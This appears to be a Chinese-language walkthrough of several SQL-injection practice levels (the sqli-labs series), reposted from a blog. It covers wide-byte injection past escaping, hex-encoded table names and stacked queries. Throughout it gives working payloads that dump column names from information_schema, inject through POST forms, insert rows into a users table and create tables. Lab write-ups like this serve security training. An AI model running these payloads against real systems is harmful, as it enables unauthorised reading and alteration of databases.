这关一样,闭合变成(",简单测试,#号不能用
?id=1") and ("1")=("1")--+
这关会把我们的输入里的单引号前面都加一个\使得单引号转义,使它没有任何意义只是一个字符,所以应该是宽字节注入。什么是宽字节?
?id=-1%df‘ union select 1,2,database() --+
看到\和%df已经组合成功了
爆列名:
?id=-1%df‘ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
这里将users进行hex编码可绕过‘单引号
之后操作一样
这关和32关一样啊,payload一模一样都能用,看了下源码连这关的标题都写的32...
这关就是就是变成POST请求,order by只能猜到2列数据
爆列名:
uname=admin1%df‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #&passwd=admin1&submit=Submit&
这关还是有转义,但变成数字型注入了,不用引号了。直接注入就行。但是指定表名和数据库名查询还是要hex编码。
爆列名:
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
这关就是浏览器输入的值经过mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
下列字符受影响:
?id=-1%df‘ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+
这关和34关类似,一样的payload,用post方法提交
爆列名:
uname=admin1%df‘ union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #&passwd=admin1&submit=Submit&
这关看标题是堆叠注入,就是把很多条sql语句堆在一起使用,用分号区分不同的sql语句。虽然限制很多但利用mysqli_multi_query()函数就支持多条sql语句同时执行。
平常sql注入受到sql语句的限制就是来查查数据,但利用堆叠注入完全可以自己构造sql语句,对数据库进行增删改查操作,可谓危害很大。
这关也可以用寻常的sql注入套路。
向users表插入数据
?id=1‘;insert into users(id,username,password) value (66,‘acca‘,‘bbc‘) --+
新建一个以emails表为模板的表
?id=1‘;create table test like emails;--+
和上一关一样,没有闭合了变成数字型注入,其他一样。
新建一个以emails表为模板的表
?id=1;create table test like emails;--+
与前几关一样,闭合变成‘)
插入数据
?id=1‘) ;insert into users(id,username,password) values(‘17‘,‘aaa‘,‘bbb‘); %23
原文:https://www.cnblogs.com/Xy--1/p/12747192.html